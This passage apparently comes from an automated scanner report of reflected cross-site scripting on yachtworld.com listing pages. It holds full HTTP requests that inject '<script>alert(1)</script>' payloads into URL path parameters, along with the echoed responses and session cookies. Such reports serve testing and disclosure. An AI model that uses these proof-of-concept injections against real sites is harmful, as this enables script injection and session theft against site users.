Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:24 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States&boat_id=2141315">
...[SNIP]...

3.106. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a83"><script>alert(1)</script>62580daf9dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States&boat_id=2141315">
...[SNIP]...

3.107. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f083"><script>alert(1)</script>b717be1f98b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:31 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:31 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5D